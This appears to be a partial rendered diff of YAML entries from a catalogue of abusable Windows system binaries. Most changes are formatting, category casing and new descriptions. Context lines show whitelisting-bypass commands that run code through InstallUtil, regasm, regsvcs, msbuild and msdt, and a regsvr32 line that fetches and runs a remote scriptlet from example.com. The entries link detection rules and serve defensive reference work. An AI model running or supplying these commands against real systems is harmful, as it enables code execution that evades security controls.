- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- IOC: cmd /c as child process of ftp.exe - IOC: cmd /c as child process of ftp.exe
@ -37,5 +37,4 @@ Acknowledgement:
- Person: BennyHusted - Person: BennyHusted
Handle: '' Handle: ''
- Person: Amit Serper - Person: Amit Serper
Handle: '@0xAmit ' Handle: '@0xAmit'
---

@ -176,4 +176,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jesus Galvez - Person: Jesus Galvez
Handle: Handle:
---

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -35,4 +35,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -20,4 +20,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Wade Hickey - Person: Wade Hickey
Handle: '@notwhickey' Handle: '@notwhickey'
---

@ -1,6 +1,6 @@
--- ---
Name: Ie4uinit.exe Name: Ie4uinit.exe
Description: Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

@ -17,6 +17,7 @@ Commands:
Category: Compile Category: Compile
Privileges: User Privileges: User
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10,7
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
Handle: '@VakninHai' Handle: '@VakninHai'
- Person: Lior Adar - Person: Lior Adar
Handle: Handle:
---

@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Code_Sample: Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Kyle Hanslovan - Person: Kyle Hanslovan
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
---

@ -7,7 +7,7 @@ Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -24,7 +24,7 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
@ -39,4 +39,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Malwrologist - Person: Malwrologist
Handle: '@DissectMalware' Handle: '@DissectMalware'
---

@ -40,4 +40,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@gN3mes1s' Handle: '@gN3mes1s'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@FortyNorthSec' Handle: '@FortyNorthSec'
- Person: Bank Security - Person: Bank Security
Handle: '@Bank_Security' Handle: '@Bank_Security'
---

@ -22,7 +22,7 @@ Full_Path:
- Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe
Code_Sample: Code_Sample:
- Code: - Code:
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@bohops' Handle: '@bohops'
- Person: clem - Person: clem
Handle: '@clavoillotte' Handle: '@clavoillotte'
---

@ -53,4 +53,3 @@ Acknowledgement:
Handle: '' Handle: ''
- Person: Cedric - Person: Cedric
Handle: '@th3c3dr1c' Handle: '@th3c3dr1c'
---

@ -7,7 +7,7 @@ Commands:
- Command: msbuild.exe pshell.xml - Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file. Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code Usecase: Compile and run code
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -77,4 +77,3 @@ Acknowledgement:
Handle: '@Cneelis' Handle: '@Cneelis'
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---

@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

@ -14,7 +14,7 @@ Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting Usecase: Execute code bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

@ -69,4 +69,3 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -51,4 +51,3 @@ Acknowledgement:
Handle: '@netbiosX' Handle: '@netbiosX'
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
---

@ -34,4 +34,3 @@ Acknowledgement:
Handle: Handle:
- Person: 'Xabier Ugarte-Pedrero' - Person: 'Xabier Ugarte-Pedrero'
Handle: Handle:
---

@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Adam - Person: Adam
Handle: '@Hexacorn' Handle: '@Hexacorn'
---

@ -19,4 +19,3 @@ Detection:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

@ -21,4 +21,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

@ -38,4 +38,3 @@ Acknowledgement:
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
- Person: Fab - Person: Fab
Handle: '@0rbz_' Handle: '@0rbz_'
---

@ -22,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

@ -31,4 +31,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Derek Johnson - Person: Derek Johnson
Handle: '' Handle: ''
---

@ -22,4 +22,3 @@ Acknowledgement:
Handle: '@LuxNoBulIshit' Handle: '@LuxNoBulIshit'
- Person: Avihay eldad - Person: Avihay eldad
Handle: '@aloneliassaf' Handle: '@aloneliassaf'
---

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

@ -40,4 +40,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -28,4 +28,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Leon Rodenko - Person: Leon Rodenko
Handle: '@L3m0nada' Handle: '@L3m0nada'
---

@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: FireEye - Person: FireEye
Handle: '@FireEye' Handle: '@FireEye'
---

@ -41,4 +41,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Grzegorz Tworek - Person: Grzegorz Tworek
Handle: '@0gtweet' Handle: '@0gtweet'
---

@ -36,4 +36,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -7,7 +7,7 @@ Commands:
- Command: regasm.exe AllTheThingsx64.dll - Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Eli Salem - Person: Eli Salem
Handle: '@elisalem9' Handle: '@elisalem9'
---

@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
---

@ -14,7 +14,7 @@ Commands:
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

@ -7,14 +7,14 @@ Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll. Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll. Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -57,4 +57,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: elceef - Person: elceef
Handle: '@elceef' Handle: '@elceef'
---

@ -39,4 +39,3 @@ Acknowledgement:
Handle: '@splinter_code' Handle: '@splinter_code'
- Person: ap - Person: ap
Handle: '@decoder_it' Handle: '@decoder_it'
---

@ -91,4 +91,3 @@ Acknowledgement:
Handle: '@404death' Handle: '@404death'
- Person: Martin Ingesen - Person: Martin Ingesen
Handle: '@Mrtn9' Handle: '@Mrtn9'
---

@ -1,6 +1,6 @@
--- ---
Name: Runonce.exe Name: Runonce.exe
Description: Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

@ -1,6 +1,6 @@
--- ---
Name: Runscripthelper.exe Name: Runscripthelper.exe
Description: Description: Execute target PowerShell script
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---

@ -36,4 +36,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

@ -1,6 +1,6 @@
--- ---
Name: Scriptrunner.exe Name: Scriptrunner.exe
Description: Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@nicktyrer' Handle: '@nicktyrer'
---

@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@hexacorn' Handle: '@hexacorn'
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

@ -22,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Eral4m - Person: Eral4m
Handle: '@eral4m' Handle: '@eral4m'
---

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Nick Landers - Person: Nick Landers
Handle: '@monoxgas' Handle: '@monoxgas'
---

@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Maxime Nadeau - Person: Maxime Nadeau
Handle: '@m_nad0' Handle: '@m_nad0'
---

@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@oulusoyum' Handle: '@oulusoyum'
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---

@ -31,4 +31,3 @@ Acknowledgement:
Handle: Handle:
- Person: Hai Vaknin(Lux) - Person: Hai Vaknin(Lux)
Handle: Handle:
---

Some files were not shown because too many files have changed in this diff Show More